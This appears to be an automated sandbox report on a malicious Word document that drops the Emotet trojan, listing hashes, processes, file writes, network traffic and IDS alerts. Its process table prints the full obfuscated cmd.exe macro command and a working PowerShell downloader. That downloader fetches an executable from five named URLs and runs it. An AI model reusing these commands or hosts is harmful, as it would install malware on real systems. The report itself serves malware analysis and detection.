download: | cBhoO |
Full analysis: | https://app.any.run/tasks/50e28893-3a19-4052-8d70-b4617d684cff |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 11:39:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Colin, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 06:29:00 2018, Last Saved Time/Date: Wed Nov 14 06:29:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 050EE0A338BC0A9D319BD6F0BD100575 |
SHA1: | 241D7C428E9FDEE8278959CCB40B40A5DAAA467B |
SHA256: | 7AB984982B1B020D54E198116505AB1AAFEE30323C6FA41D6E71D53B8796B802 |
SSDEEP: | 1536:vJK+lhLocn1kp59gxBK85fBt+a9Rjduedt9+d5paxyNs:vJbla41k/W487jduedt9+d5paxyW |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Colin |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:14 06:29:00 |
ModifyDate: | 2018:11:14 06:29:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 13 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 14 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2564 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\cBhoO.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2252 | cmd /V^:^O/C"^se^t M^y=)^Z^W^$YNG^uz^i^E^sJ^SB^p^Oc^4e^x^}@^\at^[/^o^w^Q^L^IP]^jF(^g^l5r^ynq^T^k^0m^-'^2b.U^:^,^1^f^d^ ^{^h;v=^M^+&&^f^or %^2 ^in (15,^2^8,^29,^19^,4^1,^1^1,6^2,^19,^39^,^3^9^,60,^3^,7^,^11^,6^2,^65^,^50^,8,^9^,1,50,63^,3,4^,31,^8^,^6^5^,^50^,^6^2,^25,2^5,^15^,^55,^2^7^,^2^7,^59,^7^,62^,^2^8,1^7,3^8,25^,1^7,^5^3,1^7^,^2^8^,^4^8,27^,3^9,4^4,25^,^15,2^2,62,^2^5,2^5^,15,^55^,27^,27,^52,19^,1^1^,^2^5^,25,4^1^,^2^4^,^64^,19,^39,11,^53^,3^9^,^9^,^64,19,^2^7^,4^0,^1^5^,5^4^,^2^2^,6^2,2^5^,^25,^15^,55,^27,^2^7,^1^1,^24^,^9^,^1^1^,^9^,59^,5^9^,62,53,1^7^,2^8^,4^8^,^2^7,4,2^8^,^2,1^,^59,^18,^2^2,^6^2,^25,^2^5^,15,^55,^27^,2^7,9,4^3,^11,7,4^8,1^9,^2^0^,53,17,2^8,^4^8,^53^,^4^8^,^20^,2^7,8^,4^5^,66^,5^9^,^5^1^,22,^62,^2^5,2^5^,^1^5,^5^5,^2^7,^27^,3^8^,9,^24^,4^3,^38,4^3^,38^,^7^,42^,^1^9^,^4^3^,^41,19^,^2^4,^39^,53^,^1^7,28^,4^8,2^7,^45^,50,^53,1^3,1^5^,3^9^,^9,^25,^3^7,^50^,22,50^,0,^6^3^,^3^,^3^5^,^48^,^64^,65,^37,^26,13^,4^2,1^1,2^5^,1^9,^4^8,^5^3^,^3^2^,^1^6^,^5^3^,33^,24^,2^5,^6^2^,^34^,55,^55,6,1^9^,2^5,^4^5,^1^9^,^4^8,^1^5^,^33^,2^4,25,^6^2^,^37^,0^,^67,5^0,2^3^,^12,^30,9,5^3^,^19^,2^0,^1^9,50,^0^,^6^3^,3,36,46,^30,^6^0,^65^,^5^,^1^9,^29,^4^9,^1^6,^52,3^5^,^1^9,^17^,^2^5,60^,4^9^,^1^7^,^2^8^,^48,60,50^,^4^8^,^1^1,^20^,4^8^,^39,51,5^3,20,48^,^3^9^,6^2,25,25^,^1^5,^50,^6^3^,^3^,^1,^4^6^,4^8,60^,^6^5^,^6^0,^5^,^1^9^,29,4^9,16,^5^2,^35,19^,1^7^,^25,^60^,49^,^1^7^,^28^,^4^8^,6^0,^5^0^,^2^4^,5^9^,^2^8,^5^9,5^2^,5^3^,11^,25,^4^1,^19,^2^4,4^8^,^50,63,^58^,^2^8^,^4^1,19^,^2^4^,^1^7,^6^2^,^37,3,3^5^,^2^8^,44^,60,9,^4^3,60^,^3,^4,31,^8,0,61^,25,^41^,^4^2^,^61,3^,^3^6,^4^6,30^,^5^3^,^2^8,15,^19,4^3^,^3^7,50,^6,^1^0,45^,50^,^5^6,^3^,3^5,28,^4^4^,^5^6,^4^7,0,6^3^,^3,3^6,46,3^0^,53,11^,19,43,59^,^3^7,0,6^3^,^3^,1^,^46,^48^,^53,28^,1^5^,19^,^43,^3^7,0^,6^3,^3,1,46^,^4^8,^5^3,^25^,42,^1^5^,^1^9,^60^,65,^6^0^,^57^,6^3^,^3^,^1^,46^,48^,53,29^,4^1^,^9^,25^,19,37^,^3,^3^6^,4^6^,3^0,^53^,^4^1,19^,1^1,1^5^,^28,4^3,11^,^1^9,14,^2^8,59^,^42,0,63,^3,1,4^6,4^8^,^5^3^,1^1,24^,6^4,19^,25^,^28^,^58,9,^3^9,^1^9^,3^7^,3,35,^4^8^,64,0,^63,^1^3,^25^,2^4^,4^1,25,49^,^33^,4^1,^2^8^,1^7^,1^9^,11^,1^1,60,^3^,^3^5^,^4^8^,6^4^,^6^3^,52,41,1^9,2^4,46^,^2^1,^17,2^4,^2^5^,^1^7,^6^2,^6^1^,2^1,21,60^,^60^,^60^,6^0,60^,60^,6^0^,60,60,^60^,60^,6^0^,6^0,60,^60,6^0^,^60,69)^do ^s^et ^B^1=!^B^1!!M^y:~%^2,1!&&^if %^2=^=^69 c^a^l^l %^B^1:*^B1!^=%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3368 | powershell $ush='ziZ';$YLz='http://duhocgtc.com/lqtp@http://besttravels.live/5pU@http://saisiddh.com/YoWZd4@http://insumex.com.mx/zTMd2@http://giangnguyenreal.com/T'.Split('@');$jmv=([System.IO.Path]::GetTempPath()+'\JQi.exe');$FkQ =New-Object -com 'msxml2.xmlhttp';$Zkm = New-Object -com 'adodb.stream';foreach($joq in $YLz){try{$FkQ.open('GET',$joq,0);$FkQ.send();$Zkm.open();$Zkm.type = 1;$Zkm.write($FkQ.responseBody);$Zkm.savetofile($jmv);Start-Process $jmv;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1264 | "C:\Users\admin\AppData\Local\Temp\JQi.exe" | C:\Users\admin\AppData\Local\Temp\JQi.exe | — | powershell.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
3448 | "C:\Users\admin\AppData\Local\Temp\JQi.exe" | C:\Users\admin\AppData\Local\Temp\JQi.exe | JQi.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
2216 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | JQi.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
4068 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Version: 6.1.7600.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9B80.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5HZI8TMJ41ZXJ7KWBMCY.temp | — | |
MD5:— | SHA256:— | |||
3448 | JQi.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:937E7DF7B3830852B5C89666F182F1F7 | SHA256:B453E2189C74D790D64C349169DAE27113263DB74233F05F327B642637E442BF | |||
3368 | powershell.exe | C:\Users\admin\AppData\Local\Temp\JQi.exe | executable | |
MD5:937E7DF7B3830852B5C89666F182F1F7 | SHA256:B453E2189C74D790D64C349169DAE27113263DB74233F05F327B642637E442BF | |||
2564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$cBhoO.doc | pgc | |
MD5:1E001FBFF8775286ECD0C380FEE9262F | SHA256:CBE1C26E21B1BCCE233643C39CEEDD120222B9CA8B8F55744620536BEB92C0F8 | |||
3368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da90d.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2564 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BEFEA26C8A4DCFEA564F9EFCEC5865C3 | SHA256:551EF632D788BA0FCDF95710A48389315FAA34AA7E3EA2025359AA97F0F7FB4D |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4068 | lpiograd.exe | GET | — | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | — | — | malicious |
3368 | powershell.exe | GET | 200 | 103.81.85.177:80 | http://duhocgtc.com/lqtp/ | VN | executable | 448 Kb | malicious |
3368 | powershell.exe | GET | 301 | 103.81.85.177:80 | http://duhocgtc.com/lqtp | VN | html | 672 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3368 | powershell.exe | 103.81.85.177:80 | duhocgtc.com | The Corporation for Financing & Promoting Technology | VN | suspicious |
4068 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
Domain | IP | Reputation |
---|---|---|
duhocgtc.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3368 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3368 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3368 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |